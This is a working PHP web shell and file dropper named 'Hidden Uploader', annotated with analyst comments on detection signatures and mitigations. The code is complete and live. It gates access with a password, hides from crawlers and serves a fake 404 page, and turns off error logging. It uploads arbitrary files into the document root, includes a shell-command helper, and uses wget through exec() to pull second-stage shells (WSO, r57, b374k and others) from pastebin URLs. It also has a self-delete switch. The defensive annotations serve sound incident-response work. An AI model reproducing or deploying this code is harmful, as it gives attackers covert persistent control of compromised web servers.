mrandraz404

Hidden Uploder (xai)

Apr 1st, 2017
  1. <?php
  // ANALYST NOTE: this listing is a password-gated PHP web shell / file dropper, annotated here for detection and response.
  // $auth_pass is compared with md5($_POST['pass']) further down, so the value is an unsalted MD5 digest;
  // the literal itself is a usable content signature for file scans.
  2. $auth_pass = "2ed348e96478fc3e4b88bcfb1882f684"; //
  3. session_start();
  // The calls below switch off error reporting, display and logging and lift the execution time limit.
  // For responders: expect no trace of this script in the PHP error log; rely on web-server access logs
  // and file-integrity monitoring instead.
  4. error_reporting(0);
  5. set_time_limit(0);
  // set_magic_quotes_runtime() was removed in PHP 7.0, which suggests the code was written for PHP 5-era hosts.
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  // The panel is rendered only when the `show` query parameter is present; any other request falls through
  // to the logout / kill / fake-404 branches at the end of the listing.
  14. if(isset($_GET['show'])){
  // These four variables are not read anywhere else in the visible listing. 'FilesMan' is a string commonly
  // seen in WSO-derived shells, so this is presumably copied boilerplate (useful as a weak signature only).
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  // Cloaking: a request whose User-Agent matches any listed crawler/bot name (case-insensitive) gets a bare
  // 404 status and no body. Detection idea: a .php URL that answers 404 to crawler User-Agents but serves
  // content to browser User-Agents for the same `?show` request.
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22. header('HTTP/1.0 404 Not Found');
  23. exit;
  24. }
  25. }
  26.  
  // login_shell(): prints a minimal HTML page holding one password field named `pass` that POSTs back to the
  // same URL, then calls exit so nothing after the form is rendered. Takes no arguments and never returns.
  // The page title and the remote image URL are static strings and can serve as response-body signatures.
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <head>
  31. <title>Xai Syndicate</title>
  32. <style type="text/css">
  33. html {
  34. background: #000000;
  35. color: green;
  36. }
  37. header {
  38. color: green;
  39. margin: 10px auto;
  40. }
  41. input[type=password] {
  42. width: 250px;
  43. height: 25px;
  44. color: red;
  45. background: #000000;
  46. border: 1px solid #ffffff;
  47. padding: 5px;
  48. margin-left: 20px;
  49. text-align: center;
  50. }
  51. </style>
  52. </head>
  53. <header>
  54. <center><img src="http://i.imgur.com/fW1hCGC.png" width="30%" height="50%"></img></center>
  55. </header>
  56. <form method="post">
  57. <center><input type="password" name="pass"><center>
  58. </form>
  59. <?php
  60. exit;
  61.  
  62. }
  // Access gate. The session flag is keyed by md5() of the Host header. It is set when $auth_pass is empty or
  // when md5() of the posted `pass` field loosely equals (==) $auth_pass; otherwise login_shell() prints the
  // form and exits. The `else` binds to the inner `if`.
  // The password only protects the operator's access; the file remains a compromise indicator either way.
  63. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  64. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  65. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  66. else
  67. login_shell();
  68. ?>
  69. <html>
  70. <head>
  71. <title>$Hidden Uploader$</title>
  72. <style type='text/css'>
  73. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  74. html {
  75. background-color: black;
  76. color: white;
  77. font-size: 13px;
  78. }
  79. a{
  80. color:red;
  81. text-decoration: none;
  82. }
  83. textarea{
  84. backgroud-color:#333333;
  85. color: white;
  86. }
  87. table, th, td {
  88. border-collapse:collapse;
  89. font-family: Tahoma, Geneva, sans-serif;
  90. background: transparent;
  91. font-family: 'Ubuntu';
  92. font-size: 13px;
  93. }
  94. select{
  95. border: 1px white solid;
  96. -moz-border-radius: 5px;
  97. -webkit-border-radius:5px;
  98. border-radius:5px;
  99. }
  100. input[type=submit] {
  101. background: transparent;
  102. color: #ffffff;
  103. height: 24px;
  104. border: 1px solid #ffffff;
  105. margin: 5px auto;
  106. padding-left: 5px;
  107. font-family: 'Ubuntu';
  108. font-size: 13px;
  109. }
  110. </style>
  111. </head>
  112. <center>
  113. <img src="https://media.giphy.com/media/26gsvp8v9bZCLhiOQ/source.gif" width="200px" height="270px"><br>
  114. <font color='white' size="6">$</font><font color='blue' size="8">Hidden Uploader</font><font color='white' size="6">$</font><br>
  115. <body bgcolor="black">
  116. <?php
  /**
   * Wrap a permission string in a <font> tag whose colour reflects writability.
   *
   * @param string $dir  Path tested with is_writable().
   * @param string $perm Text to wrap (concatenated as-is, not escaped).
   * @return string "<font color=green>…</font>" when $dir is writable, red otherwise.
   */
  function w($dir, $perm) {
      $colour = is_writable($dir) ? 'green' : 'red';

      return "<font color=" . $colour . ">" . $perm . "</font>";
  }
  // exe($cmd): hands $cmd to the operating-system shell through the first of system(), exec(), passthru(),
  // shell_exec() for which function_exists() is true, and returns whatever output was captured.
  // Falls off the end (returns null) when none of the four exists. Errors are suppressed with @.
  // It is not called anywhere in the visible listing; the dropper further down calls exec() directly.
  // Hardening: hosts that do not need these functions can list them in php.ini `disable_functions`.
  124. function exe($cmd) {
  125. if(function_exists('system')) {
  // system() prints directly, so the output is captured through an output buffer.
  126. @ob_start();
  127. @system($cmd);
  128. $buff = @ob_get_contents();
  129. @ob_end_clean();
  130. return $buff;
  131. } elseif(function_exists('exec')) {
  132. @exec($cmd,$results);
  133. $buff = "";
  // Output lines are concatenated without any separator.
  134. foreach($results as $result) {
  135. $buff .= $result;
  136. } return $buff;
  137. } elseif(function_exists('passthru')) {
  138. @ob_start();
  139. @passthru($cmd);
  140. $buff = @ob_get_contents();
  141. @ob_end_clean();
  142. return $buff;
  143. } elseif(function_exists('shell_exec')) {
  144. $buff = @shell_exec($cmd);
  145. return $buff;
  146. }
  147. }
  // sulap($text): returns $text unchanged when magic quotes GPC is off, otherwise returns it with
  // backslashes stripped. get_magic_quotes_gpc() was removed in PHP 8.0, another sign of PHP 5-era code.
  // Not called anywhere in the visible listing.
  148. function sulap($text) {
  149. if(!get_magic_quotes_gpc()) {
  150. return $text;
  151. }
  152. return stripslashes($text);
  153. }
  /**
   * Return the text found between two marker strings.
   *
   * @param string $param Text to search.
   * @param string $kata1 Opening marker.
   * @param string $kata2 Closing marker; the search for it starts right after the opening marker.
   * @return string|false The enclosed text, or false when either marker does not occur in $param at all.
   */
  function ambilKata($param, $kata1, $kata2){
      $openAt = strpos($param, $kata1);
      if ($openAt === false || strpos($param, $kata2) === false) {
          return false;
      }

      $from = $openAt + strlen($kata1);
      $to = strpos($param, $kata2, $from);

      return substr($param, $from, $to - $from);
  }
  /**
   * Render a file's mode as a ten-character, ls-style string (e.g. "-rw-r--r--").
   *
   * @param string $file Path passed to fileperms().
   * @return string File-type character followed by owner, group and world rwx triplets,
   *                with s/S (setuid, setgid) and t/T (sticky) in the execute position.
   */
  function perms($file){
      $mode = fileperms($file);

      // File type: the first mask that matches in full wins; the order matters because the masks overlap.
      $typeMasks = [
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      ];
      $out = 'u'; // unknown
      foreach ($typeMasks as $mask => $char) {
          if (($mode & $mask) == $mask) {
              $out = $char;
              break;
          }
      }

      // One row per class: read bit, write bit, execute bit, special bit,
      // character for special+execute, character for special without execute.
      $classes = [
          [0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'], // owner / setuid
          [0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'], // group / setgid
          [0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'], // world / sticky
      ];
      foreach ($classes as $row) {
          list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $row;

          $out .= ($mode & $readBit) ? 'r' : '-';
          $out .= ($mode & $writeBit) ? 'w' : '-';
          if ($mode & $execBit) {
              $out .= ($mode & $specialBit) ? $withExec : 'x';
          } else {
              $out .= ($mode & $specialBit) ? $withoutExec : '-';
          }
      }

      return $out;
  }
  // Panel header. Error reporting is re-enabled for everything except notices and warnings.
  213. error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
  // $ds is never assigned in the visible listing, so this prints NONE whatever the real php.ini setting is.
  214. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  // Discloses the address the Host header resolves to and the php_uname() string to whoever is logged in.
  215. echo "<b><font color='green'><br>Server IP : ".gethostbyname($_SERVER['HTTP_HOST'])."</b></font>";
  216. echo "<b><font color='green'><br>".php_uname()."</b></font><br>";
  217. echo "<b><font color='green'>Disable Functions: $show_ds</b></font><br><br>";
  // Navigation links. The query strings `?show`, `?c7e=kill` and `?bye=logout` are distinctive
  // and worth searching for in web-server access logs.
  218. echo "&nbsp;<a href='?show' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>&nbsp;<a href='?c7e=kill' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>&nbsp;<a href='?bye=logout' style='color:red;border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>L O G O U T</a>";
  // Multipart upload form: file field `file`, submit field `upload`, posted back to the same URL.
  219. echo "<form method='post' enctype='multipart/form-data'>
  220. <input type='file' name='file'>
  221. <input type='submit' value='upload' name='upload'>
  222. </form>";
  // Upload handler. The destination is built from the client-supplied file name with no validation of
  // name, extension or content, and copy() is used rather than move_uploaded_file().
  // If the document root is writable the file lands there; otherwise it is copied, under the same
  // client-supplied name, relative to the current working directory.
  // Detection: files appearing in the document root (or beside this script) right after a multipart POST
  // to it; response bodies containing "sukses upload" / "gagal upload" (Indonesian: upload succeeded / failed).
  // Mitigation: the web-server account should not have write access to the document root, and PHP
  // execution should be disabled in any directory that has to stay writable.
  223. $root = $_SERVER['DOCUMENT_ROOT'];
  // Read on every request, before the check that an upload was actually submitted.
  224. $files = $_FILES['file']['name'];
  225. $dest = $root.'/'.$files;
  226. if(isset($_POST['upload'])) {
  227. if(is_writable($root)) {
  228. if(@copy($_FILES['file']['tmp_name'], $dest)) {
  229. $web = "http://".$_SERVER['HTTP_HOST']."/";
  230. echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  231. } else {
  232. echo "gagal upload di document root.";
  233. }
  234. } else {
  235. if(@copy($_FILES['file']['tmp_name'], $files)) {
  236. echo "sukses upload <b>$files</b> di folder ini";
  237. } else {
  238. echo "gagal upload";
  239. }
  240. }
  241. }
  // "Shell Creator" form: a select box named `shell` and a submit button named `enter`.
  242. echo"<table align=center>";
  243. echo"<td>";
  244. echo"<form method='post'> ";
  245. echo"<select name='shell' style=padding:5px 10px;>";
  246. echo"<option selected'> Shell Creator </option>";
  247. echo"<option value='wso'> WSO Shell </option>";
  248. echo"<option value='idx'> IDX Shell </option>";
  249. echo"<option value='r57'> R57 Shell </option>";
  250. echo"<option value='b374k'> B374K Shell </option>";
  251. echo"<option value='sadrazam'> Sadrazam Shell </option>";
  252. echo"<option value='blackhat'> BlackHat Shell </option>";
  253. echo"<option value='noname'> Noname Shell </option>";
  254. echo "</select>";
  255. echo"&nbsp;<input type='submit' class='btn btn-success btn-sm' name='enter' value='Submit!'>";
  // Second-stage dropper. Each branch runs wget through exec() to fetch a paste from pastebin.com into a
  // fixed file name in the current working directory, then reports success if that file exists.
  // Indicators: the output names wsoshell.php, idx.php, r57.php, wso.php, b374k.php, sadrazam.php, bh.php
  // and noname.php next to this script, and outbound HTTP from the web-server process to pastebin.com.
  // Mitigation: egress filtering on the web tier and `disable_functions` for exec-style functions.
  256. if(isset($_POST['enter'])) {
  // This branch tests a `lucknut` field that the form above does not define.
  257. if ($_POST['lucknut'] == 'wso_shell') {
  258. $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wsoshell.php');
  259. if(file_exists('./wsoshell.php')){
  260. echo '<center><a href=./wsoshell.php target="_blank"> wso.php </a> upload sukses !</center>';
  261. } else {
  262. echo '<center>gagal upload !</center>';
  263. }
  264. }elseif($_POST['shell'] == 'idx') {
  265. $exec=exec('wget http://pastebin.com/raw.php?i=nC6pWh5a -O idx.php');
  266. if(file_exists('./idx.php')){
  267. echo '<center><a href=./idx.php target="_blank"> idx.php </a> upload sukses !</center>';
  268. } else {
  269. echo '<center>Failed!</center>';
  270. }
  271. }elseif($_POST['shell'] == 'r57') {
  272. $exec=exec('wget http://pastebin.com/raw.php?i=S9tzBgg3 -O r57.php');
  273. if(file_exists('./r57.php')){
  274. echo '<center><a href=./r57.php target="_blank"> r57.php </a> upload sukses !</center>';
  275. } else {
  276. echo '<center>Failed!</center>';
  277. }
  278. }elseif($_POST['shell'] == 'wso') {
  // Responder caveat: the existence check looks for wsp.php while wget writes wso.php, so a "Failed!"
  // response from this branch does not mean nothing was written; check the directory itself.
  279. $exec=exec('wget http://pastebin.com/raw.php?i=N0eh3Q7Y -O wso.php');
  280. if(file_exists('./wsp.php')){
  281. echo '<center><a href=./wso.php target="_blank"> wso.php </a> upload sukses !</center>';
  282. } else {
  283. echo '<center>Failed!</center>';
  284. }
  285. }elseif($_POST['shell'] == 'b374k') {
  286. $exec=exec('wget http://pastebin.com/raw.php?i=cR71LiMp -O b374k.php');
  287. if(file_exists('./b374k.php')){
  288. echo '<center><a href=./b374k.php target="_blank"> b374k.php </a> upload sukses !</center>';
  289. } else {
  290. echo '<center>Failed!</center>';
  291. }
  292. }elseif($_POST['shell'] == 'sadrazam') {
  293. $exec=exec('wget http://pastebin.com/raw.php?i=xjKrnnBD -O sadrazam.php');
  294. if(file_exists('./sadrazam.php')){
  295. echo '<center><a href=./sadrazam.php target="_blank"> sadrazam.php </a> upload sukses !</center>';
  296. } else {
  297. echo '<center>Failed!</center>';
  298. }
  299. }elseif($_POST['shell'] == 'blackhat') {
  300. $exec=exec('wget http://pastebin.com/raw.php?i=3L2ESWeu -O bh.php');
  301. if(file_exists('./bh.php')){
  302. echo '<center><a href=./bh.php target="_blank"> bh.php </a> upload sukses !</center>';
  303. } else {
  304. echo '<center>Failed!</center>';
  305. }
  306. }elseif($_POST['shell'] == 'noname') {
  307. $exec=exec('wget http://pastebin.com/raw.php?i=BRCmf02c -O noname.php');
  308. if(file_exists('./noname.php')){
  309. echo '<center><a href=./noname.php target="_blank"> noname.php </a> upload sukses !</center>';
  310. } else {
  311. echo '<center>Failed!</center>';
  312. }
  313. }
  314. }
  315. }
  316. elseif($_GET['bye'] == 'logout') {
  317.  
  318.  
  // Logout: clears the session flag keyed by md5(Host). This branch is reached only when `show` is absent
  // from the query string.
  319. echo '<form action="?show&bye=logout" method="post">';
  320. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  321. echo 'Good Bye!!';
  322. }
  323. elseif($_GET['c7e'] == 'kill') {
  // Self-delete: unlinks this script's own path; the regex presumably strips the "(N) : eval()'d code"
  // suffix that __FILE__ carries inside eval()'d code. This branch sits outside the `show` block, so the
  // session check above does not apply to it in the visible listing.
  // Responder caveat: a missing script is not a clean host. Files it uploaded or fetched stay on disk,
  // and the access log still shows the `c7e=kill` request.
  324. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  325. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  326. else
  327. echo '<center>unlink failed!</center>';
  328. }
  329. else{
  // Decoy: a page imitating Apache's 404 body is echoed for every request without a recognised parameter.
  // No header() call sets a 404 status in this branch, so the response presumably carries the default
  // status code; a "404 Not Found" body served with a success status is a useful detection signal.
  330. echo "<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
  331. <HTML><HEAD>
  332. <TITLE>404 Not Found</TITLE>
  333. </HEAD><BODY>
  334.  
  335. <h1>Not Found</h1>
  336.  
  337. The requested URL ";
  338. echo $_SERVER['REQUEST_URI'];
  339. echo "
  340. was not found on this server.
  341. <hr>
  342.  
  343. ";
  344. echo "<address>Apache Server at ".$_SERVER['HTTP_HOST']." Port 80</address>";
  345. }
  346. ?>
  347. </center>
  348. </html>